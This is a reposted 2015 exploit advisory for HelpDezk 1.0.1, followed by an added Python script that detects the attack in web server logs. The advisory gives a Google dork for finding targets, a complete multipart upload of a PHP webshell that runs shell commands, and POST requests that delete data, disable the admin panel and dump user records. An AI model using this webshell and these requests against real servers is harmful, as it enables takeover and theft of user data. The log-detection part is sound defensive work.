Aerosol Posted February 28, 2015

# Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities
# Google Dork: "intext: helpdezk-community-1.0.1"
# Date: 26-2-2015
# Exploit Author: Dennis Veninga
# Vendor Homepage: http://www.helpdezk.org/
# Vendor contacted: 26-2-2015
# Version: 1.0.1
# Tested on: Firefox 36 & Chrome 38 / W8.1-x64

HelpDezk ->
Version: 1.0.1
Type: Multiple Critical Vulnerabilities
Severity: Critical
Info Exploit: Different exploits making it possible to take over the website/server
- Arbitrary File Upload
- Remote Command Execution
- User Information Disclosure

###############################################

Arbitrary File Upload, 2 ways ->

1. Direct Access:
http://{target}/helpdezk/admin/logos/upload

#########

2. POST: http://localhost/helpdezk/admin/logos/upload
After posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoami

CONTENT:
-----------------------------14463264629720\r\n
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\r\n
if(isset($_REQUEST['cmd'])){\r\n
$cmd = ($_REQUEST["cmd"]);\r\n
system($cmd);\r\n
echo "</pre>$cmd<pre>";\r\n
die;\r\n
}\r\n
?>\r\n
-----------------------------14463264629720--\r\n

###############################################

Remote Command Execution, you see a white page with 'ok' when SUCCESS!

Delete a download
POST: http://localhost/helpdezk/admin/downloads/delete
CONTENT: id={IDNUMBER}

Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again*
POST: http://{localhost}/helpdezk/admin/modules/deactivate
CONTENT: id=1

id=1 = Admin
id=2 = Dashboard
id=3 = HelpDezk

###############################################

User Information Disclosure

NOTE: Stop JavaScript, else it will quickly show all info and return you to the login page.
POST: http://{target}/helpdezk/admin/relPessoa/table_json/
CONTENT: typeperson=ALL

###############################################

I'm sure I didn't find everything, but maybe time to fix those huge issues first!
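A defender-side addition, not part of the advisory or of HelpDezk itself: a small Python check that flags the upload-then-execute sequence described above in web server access logs. The endpoint paths are the ones named in the advisory; the log lines, client IPs and the combined-log regex are constructed for this example.

```python
"""Flag HelpDezk upload-then-execute activity in access logs (added example)."""
import re

# Combined/common log format; we only need client IP, method, path and status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Paths taken from the advisory above.
UPLOAD_ENDPOINT = "/helpdezk/admin/logos/upload"
UPLOAD_DIR = "/helpdezk/app/uploads/logos/"

# Constructed sample log: one webshell drop, one legitimate logo upload, one failed probe.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Feb/2015:10:01:02 +0000] "POST /helpdezk/admin/logos/upload HTTP/1.1" 200 12
203.0.113.7 - - [28/Feb/2015:10:01:05 +0000] "GET /helpdezk/app/uploads/logos/shell.php?cmd=whoami HTTP/1.1" 200 64
198.51.100.4 - - [28/Feb/2015:10:02:00 +0000] "POST /helpdezk/admin/logos/upload HTTP/1.1" 200 12
198.51.100.4 - - [28/Feb/2015:10:02:03 +0000] "GET /helpdezk/app/uploads/logos/logo.png HTTP/1.1" 200 5120
192.0.2.9 - - [28/Feb/2015:10:03:00 +0000] "GET /helpdezk/app/uploads/logos/x.php HTTP/1.1" 404 0
"""


def parse_line(line):
    """Return (ip, method, path_without_query, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return ip, method, path.split("?", 1)[0], int(status)


def php_under_uploads(log_text):
    """Stateless rule: any successful request for a .php file in the logo upload
    directory is suspicious on its own, since only image logos belong there."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        _ip, _method, path, status = rec
        if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php") and 200 <= status < 300:
            hits.append(path)
    return hits


def find_webshell_candidates(log_text):
    """Stateful rule: an IP that POSTed to the upload endpoint and then fetched a
    .php file from the upload directory with a 2xx response. Returns (ip, path) pairs."""
    uploaded, hits = set(), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec
        if method == "POST" and path == UPLOAD_ENDPOINT:
            uploaded.add(ip)
        elif ip in uploaded and path.startswith(UPLOAD_DIR) \
                and path.lower().endswith(".php") and 200 <= status < 300:
            hits.append((ip, path))
    return hits
```

The stateless rule also catches the "direct access" variant, where the upload and the later execution may come from different clients.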